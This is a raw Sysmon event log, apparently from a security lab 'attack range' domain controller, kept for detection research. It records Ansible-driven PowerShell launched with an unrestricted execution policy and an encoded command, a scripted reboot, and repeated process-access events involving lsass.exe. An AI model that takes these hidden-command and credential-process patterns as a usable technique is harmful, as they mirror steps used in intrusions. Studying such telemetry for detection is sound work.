@"C:\Users\ADMINI~1\AppData\Local\Temp\t4kqsmcp.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 11241100x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\t4kqsmcp.cmdline2021-01-18 13:33:20.075 11241100x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:20.075{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\t4kqsmcp.dll2021-01-18 13:33:20.075 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.857{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.857{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.857{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.747{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.747{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8E21-6005-D802-00000000A201}51163676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|UNKNOWN(00007FFA95C9331B)|UNKNOWN(00007FFA951341A5)|UNKNOWN(00007FFA95133E76)|UNKNOWN(00007FFA95BE54DB)|UNKNOWN(00007FFA950F4A0C)|UNKNOWN(00007FFA95152EDB)|UNKNOWN(00007FFA95136540)|UNKNOWN(00007FFA95136540)|UNKNOWN(00007FFA951363D1)|UNKNOWN(00007FFA95128356)|UNKNOWN(00007FFA95134889)|UNKNOWN(00007FFA9513447C)|UNKNOWN(00007FFA951341A5)|UNKNOWN(00007FFA95133E76)|UNKNOWN(00007FFA95BE54DB)|UNKNOWN(00007FFA9511ACD7)|UNKNOWN(00007FFA9511A2A7) 154100x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.754{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by 
Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\